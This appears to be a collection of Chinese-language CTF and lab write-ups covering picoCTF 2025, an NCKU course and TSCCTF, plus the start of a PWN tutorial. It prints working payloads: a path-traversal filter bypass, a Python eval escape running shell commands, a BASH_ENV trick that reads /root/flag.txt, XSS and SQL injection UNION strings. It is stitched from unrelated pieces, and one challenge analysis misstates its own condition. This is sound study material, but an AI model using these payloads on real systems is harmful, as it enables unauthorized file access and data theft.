作業二 Write-up by owl_d

pathwalker-waf2

發現這題的path traversal重點在這個區間

1
2
3
4
5
6

<?php
      if (isset($_GET['page'])) {
        $safe_path = str_replace('../', '', $_GET['page']);
        echo file_get_contents("./page/".$safe_path.".php");
      }      
    ?>

程式只有把 ../ 換掉
所以可以使用 …/./ 的方式來 bypass
…/./ 被換掉後會變成 ../ 就一樣可以達成回到上一層的目的

https://chall.nckuctf.org:28142/?page=..././..././..././..././var/www/html/flag
即取得flag

p.s. 這題沒辦法用 ..%2f 的方式來bypass，會被當成 ../ 過濾掉

picoCTF 2025 write-ups

Web

3v@l

payload: getattr(import(‘o’+’s’), ‘po’+’pen’)(‘tac${IFS}’+chr(47)+’fl*’).read()

SSTI2

payload:

WebSockFish

在console裡面控制遊戲

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

game.load("8/8/8/8/8/8/8/R7 w - - 0 1");
true
board.position(game.fen());
undefined
makeBestMove();
undefined
ws.send("mate 0");
undefined
3verbal-sleep.picoctf.net/:1 Uncaught (in promise) Error: A listener indicated an asynchronous response by returning true, but the message channel closed before a response was received
sendMessage("mate -1")  // 表示AI被將軍，1步內輸掉

undefined
sendMessage("eval -9999")  // 表示AI處於極其不利的局面

undefined
sendMessage("mate -1")  // 

undefined
sendMessage("eval 12")  // 

undefined
sendMessage("eval -10")  // 

undefined
sendMessage("eval -999999999999999")  // 這樣才是win in a convincing manner

undefined

Apriti sesamo

emacs 代表可以在網址後加一個 ~
會發現網頁原始碼有隱藏的判斷邏輯程式碼
發現其實就是SHA1 collision

Hash-only 1

1
2
3
4
5
6

ctf-player@pico-chall$ echo 'cat /root/flag.txt' > /tmp/exploit.sh
ctf-player@pico-chall$ export BASH_ENV=/tmp/exploit.sh
ctf-player@pico-chall$ ./flaghasher
Computing the MD5 hash of /root/flag.txt....

picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_ae1d8678}4d4f660d53535446f15c1a3a7b535e50  /root/flag.txt

XSS Cheatsheet

Payloads

<script>alert(window.origin)</script> : 先測試有沒有辦法送指令進去

【網路安全實務與社會實踐】作業一

此次 Lab 共為兩題

1. phpisnice https://class.nckuctf.org/challenges#phpisnice-12
2. phpisbest https://class.nckuctf.org/challenges#phpisbest-13

phpisnice

先看一下網頁給的資訊

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

<?php
include('flag.php');

$A = $_GET['A'];
$B = $_GET['B'];

highlight_file(__FILE__);
echo '<hr>';

if (isset($A) && isset($B))
    if ($A != $B)
        if (strcmp($A, $B) == 0)
            if (md5($A) == md5($B))
                echo $flag;
            else die('ERROR: MD5(A) != MD5(B)');
        else die('ERROR: strcmp(A, B) != 0');
    else die('ERROR: A == B');
else die('ERROR: A, B should be given');

可以看出題目要求：要求找到一個值 A，使得 md5(A) == A
所以這題是標準的「md5碰撞」

重點包括：

• 基礎知識與概念（PWN 是什麼、CTF 題型介紹）
• 必要技能（逆向工程、漏洞分析、各類漏洞原理）
• 工具介紹（GDB、IDA Pro、pwntools、Radare2 等）
• 實戰案例（著名攻擊案例與 CTF 題目解析）
• 進階技巧（ROP、Heap Exploitation、Kernel Exploitation 等）
• 學習資源（免費與付費資源，包括影片與文字教學）

同時會重點介紹 Hack The Box 與 Pwnable.tw 平台的挑戰，並涵蓋 Linux 與 Windows 的 Kernel Exploitation。

PWN 教學指南

本指南將帶你從新手一路進階學習 PWN（Pwn 即「擁有 / 攻破」的黑客俚語）相關技術，包含必要基礎知識、常見漏洞類型、實用工具介紹、實戰範例解析以及進階技巧，並提供 C/C++ 與 Python 的實作範例。同時，我們也會強調 Kernel Exploitation（內核利用） 技術，幫助你了解在 Linux 與 Windows 核心層面的漏洞利用方法。

1. 基礎知識與概念

PWN 是什麼？

「PWN」原是黑客圈的俚語，意思是攻破裝置或系統並取得控制權。發音類似「砰」，象徵成功駭入系統的一聲巨響。在網路安全語境中，PWN 指透過漏洞利用、社交工程等手段，成功獲得裝置、系統或網路的未授權控制權。一旦PWN 了某系統，攻擊者便可執行任意惡意操作，例如竊取資料、植入惡意程式或癱瘓系統服務。

CTF 中 PWN 題型介紹

在 CTF（Capture The Flag）競賽中，PWN 題目通常提供一個已編譯好的二進位程式（例如 Linux ELF 或 Windows PE 檔案），該程式部署在目標伺服器上。參賽者需要對這個程式進行逆向分析和動態調試，找出其中的漏洞，透過網路與服務互動並加以利用。PWN 題目的目標通常是取得遠端系統的 shell 權限或直接讀取旗標檔案。常見的 PWN 題目漏洞包含：棧/堆緩衝區溢位、整數溢位、格式化字串漏洞等。總之，在 CTF PWN 題中，你需要發揮二進位漏洞挖掘與利用能力，突破沙盒或權限限制拿到目標系統的控制權。

SQL injection attack, querying the database type and version on MySQL and Microsoft

1. 開始會需要用到 Burp Suite Repeater 來幫忙轉成 URL Encoding 了（而且也比較方便看 response）
2. 注意註記符號 “—” 有時候要改成 “#” 才能過
3. 曾經試過的幾個payload
   1. Gifts‘+UNION+SELECT+@@version,+NULL#
   2. Gifts’%2bUNION%2bSELECT%2b%40%40version%2c%2bNULL%23 (上一個的URL型態)
   3. Gifts’ UNION SELECT @@version, ‘abc’ #
   4. Gifts’%20UNION%20SELECT%20%40%40version%2c%20’abc’%20%23（上一個的URL型態，命中！）

結論：”+”不能亂加，然後要試試看 URL型態，而且註記符號要多試試看 ”#”

2025 TSCCTF owl_d writeup

Welcome

Give you a free flag

反白就可以找到flag

Please join our discord

在announcement這裡
（我找了一天 哭）